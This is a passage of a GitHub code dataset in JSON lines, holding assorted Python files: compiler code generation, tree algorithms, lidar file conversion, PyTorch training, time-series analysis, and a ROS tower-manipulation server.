Primitivo):\n tipo2 = self.dato2.get_tipo()\n if (tipo2 != False and tipo2 == Tipo_dato.ENTERO) or (tipo2 != False and tipo2 == Tipo_dato.DECIMAL):\n dato2 = self.dato2.generar_C3D(tipo_A)\n elif tipo2 != False and tipo2 == Tipo_dato.CARACTER:\n dato2 = self.dato2.generar_C3D(Tipo_dato.ENTERO)\n else:\n dato2 = self.dato2.generar_C3D(tipo_A)\n else:\n dato2 = self.dato2.generar_C3D(tipo_A)\n\n augus += dato1[0]\n augus += dato2[0]\n\n val = new_temp()\n\n if self.operacion == Operacion_logica.AND:\n #verificar los tipos y hacer el cast de una\n augus += str(val) + \" = \" + str(dato1[1]) + \" && \" + str(dato2[1]) + \";\" + \"\\n\"\n elif self.operacion == Operacion_logica.OR:\n augus += str(val) + \" = \" + str(dato1[1]) + \" || \" + str(dato2[1]) + \";\" + \"\\n\"\n\n return [augus, val]\n\n def generar_AST(self, dot, nombre):\n nombre_hijo = \"\"\n name = \"\"\n if self.operacion == Operacion_logica.AND:\n nombre_hijo += \"AND_\" + str(new_nombre())\n name += \"&&\"\n else:\n nombre_hijo += \"OR_\" + new_nombre()\n name += \"||\"\n\n dot.edge(nombre, nombre_hijo)\n dot.node(nombre_hijo, name)\n self.dato1.generar_AST(dot, nombre_hijo)\n self.dato2.generar_AST(dot, nombre_hijo)","repo_name":"Cascarus/-OLC2-Proyecto2_201603127","sub_path":"[OLC2]Proyecto2_201603127/Traduccion/Operacion_logica.py","file_name":"Operacion_logica.py","file_ext":"py","file_size_in_byte":5247,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29191528278","text":"class Node:\n def __init__(self, value):\n self.left = None\n self.right = None\n self.value = value\n\n\ndef find_height(temp):\n if temp is None:\n return 0\n left_height = find_height(temp.left)\n right_height = find_height(temp.right)\n return left_height+right_height+1\n\n\ndef find_width(temp, level):\n if temp is None:\n return 0\n if level == 1:\n return 1\n left_width = find_width(temp.left, level-1)\n right_width = find_width(temp.right, level-1)\n return left_width + right_width\n\n\ndef find_max_width(temp):\n if temp is None:\n return 0\n height = find_height(temp)\n max_width = -1\n for i in range(1, height+1):\n width = find_width(temp, i)\n max_width = max(max_width, width)\n return max_width\n\n\nif __name__ == \"__main__\":\n root = Node(1)\n root.left = Node(2)\n root.right = Node(3)\n root.left.left = Node(4)\n root.left.right = Node(5)\n root.right.left = Node(6)\n root.right.right = Node(7)\n\n print(find_max_width(root))\n","repo_name":"cspandit/Python-DS-and-Algo","sub_path":"Binary Tree/problem/find_width_recursive.py","file_name":"find_width_recursive.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37818977072","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 31 16:32:08 2019\n\n@author: eneemann\n\n- Script to convert all .laz files in a directory to .las\n\n31 Jul 2019: Created initial version of code (EMN).\n\"\"\"\n\nimport os\nimport time\nimport subprocess\n\n# Start timer and print start time in UTC\nstart_time = time.time()\nreadable_start = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.gmtime())\nprint(\"The script start time is {}\".format(readable_start))\ntoday = time.strftime(\"%Y%m%d\")\n\n\n#lidar_dir = r\"C:\\Users\\eneemann\\Desktop\\Kanab Lidar\"\n#os.chdir(lidar_dir)\n#\n#filenumber = 0\n#dir_list = os.listdir(lidar_dir)\n#total = len(dir_list)\n#for filename in dir_list:\n# filenumber += 1\n# print(f\"Starting on file {filenumber} of {total}\")\n# base = os.path.splitext(filename)[0]\n# command = f\"pdal translate {base}.laz {base}.las\"\n# print(command)\n# subprocess.check_call(command)\n# print(f\"Done with file {filenumber}, moving on to next file ...\")\n \n \n \n \nlidar_dir = r\"C:\\Users\\eneemann\\Desktop\\Bountiful Lidar\"\nos.chdir(lidar_dir)\n\nfilenumber = 0\ndir_list = os.listdir(lidar_dir)\ntotal = len(dir_list)\nfor filename in dir_list:\n filenumber += 1\n print(f\"Starting on file {filenumber} of {total}\")\n base = os.path.splitext(filename)[0]\n command = f\"gdal_translate -of GTiff {base}.img {base}.tif\"\n print(command)\n subprocess.check_call(command)\n print(f\"Done with file {filenumber}, moving on to next file ...\")\n \n \n \n\n \nprint(\"Script shutting down ...\")\n# Stop timer and print end time in UTC\nreadable_end = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.gmtime())\nprint(\"The script end time is {}\".format(readable_end))\nprint(\"Time elapsed: {:.2f}s\".format(time.time() - start_time))","repo_name":"eneemann/lidar","sub_path":"lidar_conversion_script.py","file_name":"lidar_conversion_script.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26904953045","text":"import argparse\nfrom experiment import Experiment\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('action', choices=['train', 'test'])\n args = parser.parse_args()\n seed = 42\n\n model = Experiment(seed)\n if args.action == 'train':\n model.train()\n elif args.action == 'test':\n model.test()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"KimYoungMuri/LSTM-code-fixer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36951481573","text":"# -*- coding: utf-8 -*-\n# author: frendy\n# site: http://frendy.vip/\n# time: 28/06/2017\n\nimport os\nimport torch\nimport torch.optim as optim\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom config import MODEL_PATH, DATA_PATH\nfrom models.model import transform, Net\nfrom data import loadTrainData\n\ntrainset, trainloader = loadTrainData()\n\nnet = Net()\nif os.path.exists(MODEL_PATH):\n net.load_state_dict(torch.load(MODEL_PATH))\n\ncriterion = nn.CrossEntropyLoss()\noptimizer = optim.SGD(net.parameters(), lr=0.001, momentum=0.9)\n\nfor epoch in range(2): # loop over the dataset multiple times\n\n running_loss = 0.0\n for i, data in enumerate(trainloader, 0):\n # get the inputs\n inputs, labels = data\n\n # wrap them in Variable\n inputs, labels = Variable(inputs), Variable(labels)\n\n # zero the parameter gradients\n optimizer.zero_grad()\n\n # forward + backward + optimize\n outputs = net(inputs)\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n\n # print statistics\n running_loss += loss.data[0]\n if i % 2000 == 1999: # print every 2000 mini-batches\n print('[%d, %5d] loss: %.3f' %\n (epoch + 1, i + 1, running_loss / 2000))\n running_loss = 0.0\n\nprint('Finished Training')\n\n# save model\ntorch.save(net.state_dict(), MODEL_PATH)","repo_name":"frendyxzc/ImageClassifier","sub_path":"train/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29871751276","text":"import math\nimport numpy as np\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\n\ndef get_xa(_t, _T, _fs, _xs):\n _val = 0.0\n for n, xi in enumerate(_xs):\n _var = math.pi* _fs * (_t-n*_T)\n _val += xi * math.sin(_var)/_var if _var != 0 else xi\n return _val\n\nf = 100\ndt = 1e-5\nt = np.arange(start=0, stop=0.1, step=dt)\nx = np.sin(np.multiply(2.0*math.pi*f, t))\n\n\nfs = 300\ndT = 1.0/float(fs)\nts = np.arange(start=0, stop=0.1, step=dT)\nxs = np.sin(np.multiply(2.0*math.pi*f, ts))\n\nxa = list(map(lambda _t: get_xa(_t, _T=dT, _fs=fs, _xs=xs), t))\n\n\nfig, axs = plt.subplots(2, sharex=True, sharey=True, figsize=(12,7))\naxs[0].plot(t, x, label=\"Signal\")\naxs[0].plot(ts, xs, \"o\", label=\"Sampling\")\naxs[0].plot(t, xa, \"r--\", alpha=0.4, label=\"Shannon Interpolation\")\naxs[0].legend()\naxs[0].set_title(\"Over sampling\")\n\nfs = 70\ndT = 1.0/float(fs)\nts = np.arange(start=0, stop=0.1, step=dT)\nxs = np.sin(np.multiply(2.0*math.pi*f, ts))\n\nxa = list(map(lambda _t: get_xa(_t, _T=dT, _fs=fs, _xs=xs), t))\n\naxs[1].plot(t, x, label=\"Signal\")\naxs[1].plot(ts, xs, \"o\", label=\"Sampling\")\naxs[1].plot(t, xa, \"r--\", alpha=0.4, label=\"Shannon Interpolation\")\n# axs[1].legend()\naxs[1].set_title(\"Under sampling\")\n\nplt.savefig(\"result_sin.png\")\n# plt.show()","repo_name":"calzonelover/signal_image_processing","sub_path":"LAB01/02_sin_sample.py","file_name":"02_sin_sample.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23643317118","text":"# -*- coding: utf-8 -*-\r\n\r\nclass Palabras():\r\n \r\n __numeroFrases = 0\r\n \r\n def __init__(self,frase):\r\n self.frase = frase\r\n Palabras.__numeroFrases += 1\r\n @property\r\n def frase(self):\r\n return self.__frase\r\n @frase.setter\r\n def frase(self,frase):\r\n import re\r\n match = re.search('[a-zA-Z]+',frase)\r\n assert match, \"Palabra invalida\"\r\n self.__frase = frase \r\n @property \r\n def contarLetras(self):\r\n return len(self.frase.replace(\" \",\"\"))\r\n def subCadena(self,sub):\r\n return self.frase.count(sub)\r\n @classmethod\r\n def cuantasCreadas(cls):\r\n return \"Numero de frases creadas: {}\".format(cls.__numeroFrases)\r\n def __add__ (self, other):\r\n return Palabras(self.frase + \" \" + other.frase)\r\n def __str__(self):\r\n return \"Su frase es: \" + str(self.frase)\r\n def __eq__(self,other):\r\n if(self.frase==other.frase):\r\n return True\r\n else:\r\n return False\r\n def letrasComun(self,nuevaFrase):\r\n solucion = []\r\n for x in self.frase:\r\n if(x in nuevaFrase) and (x != ' '):\r\n solucion.append(x)\r\n return solucion\r\n @staticmethod\r\n def valida(frase):\r\n import re\r\n return bool(re.match(\"^[\\sA-Za-z]*$\",frase))\r\n def __del__(self):\r\n Palabras.__numeroFrases -= 1\r\ntry:\r\n palabra = Palabras(\"Hola mundo\")\r\n print(palabra)\r\n palabra1 = Palabras(\"Hola mundo\")\r\n palabra2 = Palabras(\"Adios chico\")\r\n print(palabra.contarLetras)\r\n print(palabra.subCadena(\"mundo\"))\r\n print(palabra.cuantasCreadas())\r\n print(palabra + palabra2)\r\n print(palabra == palabra2)\r\n print(palabra == palabra1)\r\n print(palabra.letrasComun(\"Hola mediterraneo\"))\r\n del palabra2\r\n print(palabra.cuantasCreadas())\r\n print(Palabras.valida(\"perro\"))\r\nexcept Exception as e:\r\n print(e)\r\n","repo_name":"ricardomartinez4/python","sub_path":"orientadoObjetos/practica.py","file_name":"practica.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9403821120","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nfrom statsmodels.tsa.stattools import adfuller\nimport os\nimport numpy as np\nimport seaborn as sns\nimport statsmodels\nimport matplotlib\nimport numpy as np\nimport statsmodels.api as sm\nimport statsmodels.tsa.arima_model\nfrom sklearn.model_selection import train_test_split\nfrom pandas import Series\nfrom statsmodels.tsa.seasonal import STL\nimport statsmodels.tsa.holtwinters as ets\nfrom statsmodels.tsa.seasonal import seasonal_decompose\nfrom statsmodels.tsa.seasonal import seasonal_decompose\nfrom statsmodels.tsa.holtwinters import SimpleExpSmoothing\nfrom statsmodels.tsa.holtwinters import ExponentialSmoothing\nfrom sklearn import metrics\nfrom numpy import linalg as LA\nimport math\nfrom scipy import signal\nimport warnings\nwarnings.filterwarnings('ignore')\n\ndata = pd.read_csv('underwater_temperature.csv',index_col='ID', parse_dates=True,encoding= 'unicode_escape')\nz=data.copy(deep=True)\ndf=z.iloc[::3,:]\n\nprint(df.isnull().sum().sum())\nprint(df.columns)\n#Preprocessing\nprint(df['Site'].isnull().sum().sum())\nprint(df['Latitude'].isnull().sum().sum())\nprint(df['Longitude'].isnull().sum().sum())\nprint(df['Date'].isnull().sum().sum())\nprint(df['Time'].isnull().sum().sum())\nprint(df['Temp (°C)'].isnull().sum().sum()) #2 missing values\n\n#preproccesing the Data›\ndf.rename(columns={'Temp (°C)':'Temp'},inplace=True)\nmean_value=df['Temp'].mean()\ndf['Temp'].fillna(value=mean_value, inplace=True)\nprint(df['Temp'].isnull().sum().sum()) #2 missing values\n\n#now we don't have any missing values\n#plot the data vs time\nsns.lineplot(data=df, x=\"Time\",y=\"Temp\")\nplt.title('the dependency of temp and time')\nplt.show()\n#ACF/PACF of the dependent variable\nfrom statsmodels.graphics.tsaplots import plot_acf , plot_pacf\ndef ACF_PACF_Plot(y,lags):\n acf = sm.tsa.stattools.acf(y, nlags=lags)\n pacf = sm.tsa.stattools.pacf(y, nlags=lags)\n fig = plt.figure()\n plt.subplot(211)\n plt.title('ACF/PACF of the raw data')\n plot_acf(y, ax=plt.gca(), lags=lags)\n plt.subplot(212)\n plot_pacf(y, ax=plt.gca(), lags=lags)\n fig.tight_layout(pad=3)\n plt.show()\nACF_PACF_Plot(df['Temp'],20)\nprint(pd.unique(df['Site']))\n#because of PACF the Ar is going to be 1\n\ncorr=df.corr()\nax =sns.heatmap(corr)\nplt.show()\ndf['Time']=df[\"Time\"].str[:-3]\ny=df['Temp']\nx=df.drop(['Temp','Site','Date','Time'],axis=1)\nx_train,x_test,y_train,y_test=train_test_split(x,y,test_size=0.2)\n#rolling mean\ndef rolling_mean_var(x):\n df_rolling = pd.DataFrame()\n mean=[]\n var=[]\n for i in range(len(x)):\n mean.append(x[0:i+1].mean())\n var.append(x[0:i+1].var())\n df_rolling['mean'] = mean\n df_rolling['var'] = var\n df_rolling.fillna(0, inplace=True)\n #====\n fig = plt.figure(figsize=(10, 8))\n plt.subplot(2, 1, 1)\n plt.plot('mean', data=df_rolling, label=\"Mean\", color='red')\n plt.title(\"Rolling Mean & Variance\")\n plt.xticks([])\n plt.grid()\n plt.ylabel('mean')\n plt.legend()\n plt.subplot(2, 1, 2)\n plt.plot('var', data=df_rolling, label=\"variance\", color='blue')\n plt.grid()\n plt.ylabel('variance')\n plt.legend()\n plt.show()\nrolling_mean_var(df['Temp'])\n\n#Stationary\n#ADF test for temp\n\nx=df['Temp'].values\nresault=adfuller(x)\nprint('ADF Statistic :%f'% resault[0])\nprint('p_value: %f'% resault[1])\nprint('Critical Values:')\nfor key, value in resault[4].items():\n print('\\t%s:%.3f'%(key,value))\nif resault[0] < resault[4]['5%']:\n print('Temp is Stationary')\nelse:\n print('Temp is not stationory')\n#KPS Test\nfrom statsmodels.tsa.stattools import kpss\nx=df['Temp'].values\ndef kpss_test(x):\n print ('Results of KPSS Test:')\nkpsstest = kpss(x, regression='c', nlags=\"auto\")\nkpss_output = pd.Series(kpsstest[0:3], index=['Test Statistic','p-value','LagsUsed'])\nfor key,value in kpsstest[3].items():\n kpss_output['Critical Value (%s)'%key] = value\nprint('KPSS output for Temp is :')\nprint (kpss_output)\n\n#first diferencing because the KPSS is not stationary\ndef f_difference(dataset, interval):\n diff = []\n\n for i in range(interval, len(dataset),interval):\n value = dataset[i] - dataset[i - interval]\n if i == 1:\n diff.append(0)\n elif i == 2 and interval == 2:\n diff.append(0)\n diff.append(0)\n elif i == 3 and interval == 3:\n diff.append(0)\n diff.append(0)\n diff.append(0)\n\n diff.append(value)\n return diff\nx=f_difference(df['Temp'].values,1)\n\n#Kpss after first differnecing\ndef kpss_test(x):\n print ('Results of KPSS Test:')\nkpsstest = kpss(x, regression='c', nlags=\"auto\")\nkpss_output = pd.Series(kpsstest[0:3], index=['Test Statistic','p-value','LagsUsed'])\nfor key,value in kpsstest[3].items():\n kpss_output['Critical Value (%s)'%key] = value\nprint('KPSS output for Temp is :')\nprint (kpss_output)\n\n#Decomposition\n\nTemp = df['Temp']\n# df.replace(to_replace =[\"/\"],\n# value =\"-\")\ndates= pd.date_range(start='2013-02-20 11:40:00', periods=len(df),freq='1H')\ntemp_volume= pd.Series(df['Temp'].ravel(),index=dates)\nSTL = STL(temp_volume)\nres = STL.fit()\nfig = res.plot()\nplt.xlabel(\"Time (Year)\")\nplt.suptitle('STL Decomposition', y=1.05)\nplt.show()\n#\n# #seasonality and trend\nT=res.trend\nS=res.seasonal\nR=res.resid\nadj_seasonal=Temp - S\nplt.plot(Temp,label='original')\nplt.plot(adj_seasonal,label='Seasonality Adjusted')\nplt.xlabel('time')\nplt.ylabel('Temp')\nplt.title('seasonality adjused data')\nplt.legend()\nplt.show()\n#strength of tren\nF=np.maximum(0,1-np.var(R)/np.var(np.array(T)+np.array(R)))\nprint(f'the strength of Trend is{F}')\n#dtrended\nT=res.trend\nS=res.seasonal\nR=res.resid\ndetrended=Temp - T\nplt.plot(Temp,label='original')\nplt.plot(detrended,label='detrended')\nplt.xlabel('time')\nplt.ylabel('Temp')\nplt.title('adjusted detrended')\nplt.legend()\nplt.show()\n#strength of seasonality\nF=np.maximum(0,1-np.var(R)/np.var(np.array(S)+np.array(R)))\nprint(f'the strength of seasonality is{F}')\n\n#holt_trend\nn1=len(y_train)\nn2 = len(y_test)\n# train= df['Temp'][:n1]\n# test= df['Temp'][n1:]\nmodel=ets.ExponentialSmoothing(y_train, trend='add', damped_trend=True, seasonal=None).fit()\nfitted= model.fittedvalues\nforecast_holt= model.forecast(steps=len(y_test))\nresidual_error= y_train[1:].values-fitted[:-1].values\nACF_PACF_Plot(residual_error,20)\nplt.hist(residual_error)\nplt.show()\nQ_holt=sm.stats.acorr_ljungbox(residual_error, lags=[20],return_df=True)\nprint(Q_holt)\nplt.plot(list(range(0,n1)),y_train,label='Train')\nplt.plot(list(range(n1,n1+n2)),y_test,label='Test')\nplt.plot(list(range(n1,n1+n2)),forecast_holt,label='Forecast')\nplt.title('forcast function for holt_trend')\nplt.legend()\nplt.show()\nforcast_error_holt=y_test[2:].values-forecast_holt[:-2].values\n#when the p value for Q is more than 0.05 is white which is not here now\n#Chi square test\nfrom scipy.stats import chi2\ndef chi_test(na,nb,lags,Q,e):\n DOF=lags-na-nb\n alpha=0.01\n chi_critical=chi2.ppf(1-alpha,DOF)\n if Q N: # 예전날짜+걸리는 날(시작하는 날)이 남은 N일보다 크면 새로운 날로 안가고 반복문 종료\n# break\n# i = i+T[i]\n# if i > N:\n# break\n# if i + T[i] - 1 > N: # 새로운 날짜+걸리는 날-1(끝나는 날)이 남은 N일보다 크면 반복문 종료\n# break\n# return p\n\ndef plan(i, p):\n while True:\n p = p + P[i]\n if i + T[i] - 1 > N:\n break\n i = i+T[i]\n if i > N:\n break\n if i + T[i] - 1 > N: # 새로운 날짜+걸리는 날-1(끝나는 날)이 남은 N일보다 크면 반복문 종료\n break\n profits.append(p)\n\nN = int(input())\n# schedule = [[] for _ in range(N+1)]\ncan = []\nT = [0] * (N+1)\nP = [0] * (N+1)\n\nfor i in range(1, N+1):\n Ti, Pi = map(int,input().split())\n T[i] = Ti\n P[i] = Pi\n profits = []\n\nfor i in range(1, N+1):\n if i + T[i] - 1 <= N:\n profits.append(plan(i, 0))\n\nprint(profits)\nprint(max(profits))\n\n","repo_name":"burgerfacegirl/Algorithm","sub_path":"boj/14501_퇴사.py","file_name":"14501_퇴사.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74717879447","text":"#!/usr/bin/env python\n# -*- coding: utf-8; -*-\n\"\"\"\ntower_detect_viewer_server.py\n\ncommunicating with the browser and controlling the visualization\n\n\"\"\"\n\nimport sys\nimport rospy\n\nPKG='jsk_pcl_ros'\n\nimport imp\ntry:\n imp.find_module(PKG)\nexcept:\n import roslib;roslib.load_manifest(PKG)\n\nfrom image_view2.msg import ImageMarker2, PointArrayStamped\nfrom geometry_msgs.msg import Point\nfrom std_msgs.msg import Int16\nfrom std_msgs.msg import String\nfrom std_msgs.msg import Header\nfrom jsk_pcl_ros.msg import Int32Stamped\nfrom jsk_recognition_msgs.srv import *\nimport jsk_recognition_msgs.srv\nimport tf\nfrom draw_3d_circle import Drawer3DCircle\n\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge, CvBridgeError\nimport cv\n\nclass State:\n INITIAL = 1\n SELECT_TOWER = 2\n CONFIRM = 3\n START_TASK = 4\n INITIALIZE_PROBLEM = 5\n MOVE_LARGE_S_G = 6\n MOVE_MIDDLE_S_I = 7\n MOVE_LARGE_G_I = 8\n MOVE_SMALL_S_G = 9\n MOVE_LARGE_I_S = 10\n MOVE_MIDDLE_I_G = 11\n MOVE_LARGE_S_G = 12\n def __init__(self, topic):\n self.pub = rospy.Publisher(topic, Int16)\n self.state_val = -1\n def publish(self):\n self.pub.publish(Int16(self.state_val))\n def updateState(self, next_state):\n self.state_val = next_state\n self.publish()\n\n \nclass TowerDetectViewerServer:\n # name of tower\n TOWER_LOWEST = jsk_recognition_msgs.srv.TowerRobotMoveCommandRequest.TOWER_LOWEST\n TOWER_MIDDLE = jsk_recognition_msgs.srv.TowerRobotMoveCommandRequest.TOWER_MIDDLE\n TOWER_HIGHEST = jsk_recognition_msgs.srv.TowerRobotMoveCommandRequest.TOWER_HIGHEST\n PLATE_SMALL = jsk_recognition_msgs.srv.TowerRobotMoveCommandRequest.PLATE_SMALL\n PLATE_MIDDLE = jsk_recognition_msgs.srv.TowerRobotMoveCommandRequest.PLATE_MIDDLE\n PLATE_LARGE = jsk_recognition_msgs.srv.TowerRobotMoveCommandRequest.PLATE_LARGE\n PLATE_HEIGHT_LOWEST = 0\n PLATE_HEIGHT_MIDDLE = 1\n PLATE_HEIGHT_HIGHEST = 2\n ROBOT0_BASE_FRAME_ID = \"/R1/L0\"\n ROBOT1_BASE_FRAME_ID = \"/R2/L0\"\n def __init__(self):\n # initialize the position of the tower\n self.tower_position = {\n self.TOWER_LOWEST: Point(),\n self.TOWER_MIDDLE: Point(),\n self.TOWER_HIGHEST: Point()\n }\n self.radius = rospy.get_param(\"radius\", 0.075)\n self.circle0 = Drawer3DCircle(\"/image_marker\", 1, \"/cluster00\",\n self.radius, [1, 0, 0])\n self.circle1 = Drawer3DCircle(\"/image_marker\", 2, \"/cluster01\",\n self.radius, [0, 1, 0])\n self.circle2 = Drawer3DCircle(\"/image_marker\", 3, \"/cluster02\",\n self.radius, [0, 0, 1])\n self.circles = [self.circle0, self.circle1, self.circle2]\n # bgr\n self.color_indices = [[0, 0, 255], [0, 255, 0], [255, 0, 0]]\n self.cluster_num = -1\n self.circle0.advertise()\n self.circle1.advertise()\n self.circle2.advertise()\n self.bridge = CvBridge()\n self.state = State(\"/browser/state\")\n self.tf_listener = tf.TransformListener()\n self.browser_click_sub = rospy.Subscriber(\"/browser/click\", \n Point, \n self.clickCB)\n self.browser_message_pub = rospy.Publisher(\"/browser/message\",\n String)\n self.image_sub = rospy.Subscriber(\"/image_marked\",\n Image,\n self.imageCB)\n self.cluster_num_sub = rospy.Subscriber(\"/pcl_nodelet/clustering/cluster_num\",\n Int32Stamped,\n self.clusterNumCB)\n self.check_circle_srv = rospy.Service(\"/browser/check_circle\",\n CheckCircle,\n self.checkCircleCB)\n self.pickup_srv = rospy.Service(\"/browser/pickup\",\n TowerPickUp,\n self.pickupCB)\n self.state.updateState(State.INITIAL)\n\n # waiting for ik server\n if rospy.get_param(\"~wait_robot_move_command\", False):\n rospy.loginfo(\"waiting for robot server\")\n rospy.wait_for_service(\"/browser/tower_robot_move_command\")\n self.robot_command = rospy.ServiceProxy(\"/browser/tower_robot_move_command\", TowerRobotMoveCommand)\n rospy.loginfo(\"connected to robot_move server\")\n\n # initialize the position of the towers from TL\n self.updateTowerPosition(self.TOWER_LOWEST)\n self.updateTowerPosition(self.TOWER_MIDDLE)\n self.updateTowerPosition(self.TOWER_HIGHEST)\n self.S_TOWER = self.TOWER_MIDDLE\n self.G_TOWER = None\n self.I_TOWER = None\n def towerNameToFrameId(self, tower_name):\n if tower_name == self.TOWER_LOWEST:\n return \"/cluster02\"\n elif tower_name == self.TOWER_MIDDLE:\n return \"/cluster01\"\n elif tower_name == self.TOWER_HIGHEST:\n return \"/cluster00\"\n else:\n raise Exception(\"unknown tower: %d\" % (tower_name))\n def resolveTowerName(self, tower_id):\n if tower_id == self.TOWER_LOWEST:\n return \"TOWER_LOWEST\"\n elif tower_id == self.TOWER_MIDDLE:\n return \"TOWER_MIDDLE\"\n elif tower_id == self.TOWER_HIGHEST:\n return \"TOWER_HIGHEST\"\n else:\n raise Exception(\"unknown tower: %d\" % (tower_id))\n def resolvePlateName(self, plate_id):\n if plate_id == self.PLATE_SMALL:\n return \"PLATE_SMALL\"\n elif plate_id == self.PLATE_MIDDLE:\n return \"PLATE_MIDDLE\"\n elif plate_id == self.PLATE_LARGE:\n return \"PLATE_LARGE\"\n else:\n raise Exception(\"unknown plate id: %d\" % (plate_id))\n def resolvePlateHeightOffset(self, height_id):\n \"\"\"\n return the offset of z-axis of `height_id'\n \"\"\"\n return 0.0\n def resolvePlateHeight(self, height_id):\n if height_id == self.PLATE_HEIGHT_LOWEST:\n return \"lowest\"\n elif height_id == self.PLATE_HEIGHT_MIDDLE:\n return \"middle\"\n elif height_id == self.PLATE_HEIGHT_HIGHEST:\n return \"highest\"\n else:\n raise Exception(\"unknown plate height: %d\" % (height_id))\n def robotBaseFrameId(self, index): #index is 0 or 1\n if index == 0:\n return self.ROBOT0_BASE_FRAME_ID\n elif index == 1:\n return self.ROBOT1_BASE_FRAME_ID\n else:\n raise Exception(\"unknown index: %d\" % (index))\n def updateTowerPosition(self, tower_name):\n frame_id = self.towerNameToFrameId(tower_name)\n rospy.loginfo(\"resolving %s\" % (frame_id))\n try:\n (trans, rot) = self.tf_listener.lookupTransform(\"/origin\", frame_id, rospy.Time(0))\n rospy.loginfo(\"%s => %s: (%f, %f, %f)\" % (\"/origin\", frame_id, trans[0], trans[1], trans[2]))\n self.tower_position[tower_name].x = trans[0]\n self.tower_position[tower_name].y = trans[1]\n self.tower_position[tower_name].z = trans[2]\n except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):\n rospy.logerr(\"failed to lookup transform: %s => %s\" % (\"/origin\", frame_id))\n def clusterNumCB(self, msg):\n self.cluster_num = msg.data\n def moveRobot(self, plate, from_tower, to_tower, from_height, to_height):\n robot_index = 0 #use the 1st robot first\n robot_frame_id = self.robotBaseFrameId(robot_index)\n rospy.loginfo(\"moving: %s from %s(%s) to %s(%s)\" % (self.resolvePlateName(plate), \n self.resolveTowerName(from_tower), self.resolvePlateHeight(from_height),\n self.resolveTowerName(to_tower), self.resolvePlateHeight(to_height)))\n from_target_position = self.tower_position[from_tower]\n to_target_position = self.tower_position[to_tower]\n self.robot_command(jsk_recognition_msgs.srv.TowerRobotMoveCommandRequest.ROBOT1,\n plate,\n from_tower, to_tower,\n jsk_recognition_msgs.srv.TowerRobotMoveCommandRequest.OPTION_NONE)\n # self.robot_server1(Header(), from_target_position, 0)\n # self.robot_server1(Header(), to_target_position, 1)\n def runMain(self):\n # first of all, resolve tf and store the position of the tower\n # but, we don't need to update `S' tower's position.\n # update the tf value\n self.updateTowerPosition(self.I_TOWER)\n self.updateTowerPosition(self.G_TOWER)\n self.state.updateState(State.MOVE_LARGE_S_G)\n self.moveRobot(self.PLATE_LARGE, \n self.S_TOWER, self.G_TOWER, \n self.PLATE_HEIGHT_HIGHEST, self.PLATE_HEIGHT_LOWEST)\n \n self.state.updateState(State.MOVE_MIDDLE_S_I)\n self.moveRobot(self.PLATE_MIDDLE,\n self.S_TOWER, self.I_TOWER,\n self.PLATE_HEIGHT_MIDDLE, self.PLATE_HEIGHT_LOWEST)\n \n self.state.updateState(State.MOVE_LARGE_G_I)\n self.moveRobot(self.PLATE_LARGE, \n self.G_TOWER, self.I_TOWER, \n self.PLATE_HEIGHT_LOWEST, self.PLATE_HEIGHT_MIDDLE)\n \n self.state.updateState(State.MOVE_SMALL_S_G)\n self.moveRobot(self.PLATE_SMALL, \n self.S_TOWER, self.G_TOWER, \n self.PLATE_HEIGHT_LOWEST, self.PLATE_HEIGHT_LOWEST)\n \n self.state.updateState(State.MOVE_LARGE_I_S)\n self.moveRobot(self.PLATE_LARGE, \n self.I_TOWER, self.S_TOWER, \n self.PLATE_HEIGHT_MIDDLE, self.PLATE_HEIGHT_LOWEST)\n \n self.state.updateState(State.MOVE_MIDDLE_I_G)\n self.moveRobot(self.PLATE_MIDDLE, \n self.I_TOWER, self.G_TOWER, \n self.PLATE_HEIGHT_LOWEST, self.PLATE_HEIGHT_MIDDLE)\n \n self.state.updateState(State.MOVE_LARGE_S_G)\n self.moveRobot(self.PLATE_LARGE, \n self.S_TOWER, self.G_TOWER, \n self.PLATE_HEIGHT_LOWEST, self.PLATE_HEIGHT_HIGHEST)\n def pickupCB(self, req):\n target_index = req.tower_index\n # first of all, resolveing S, I and G name binding\n # S is the START tower\n # I is the INTERMEDIATE tower\n # G is the GOAL tower\n self.G_TOWER = req.tower_index\n # lookup I\n self.I_TOWER = (set([self.TOWER_LOWEST, self.TOWER_MIDDLE, self.TOWER_HIGHEST]) \n - set([self.G_TOWER, self.S_TOWER])).pop()\n\n # update the position of the tower\n self.state.updateState(State.MOVE_LARGE_S_G)\n self.state.publish()\n self.runMain()\n self.state.updateState(State.INITIAL)\n # update S\n self.S_TOWER = self.G_TOWER\n return TowerPickUpResponse()\n def checkCircleCB(self, req):\n (width, height) = cv.GetSize(self.cv_image)\n x = int(width * req.point.x)\n y = int(height * req.point.y)\n click_index = -1\n if self.checkColor(self.cv_image[y, x], self.color_indices[0]):\n click_index = self.TOWER_HIGHEST\n elif self.checkColor(self.cv_image[y, x], self.color_indices[1]):\n click_index = 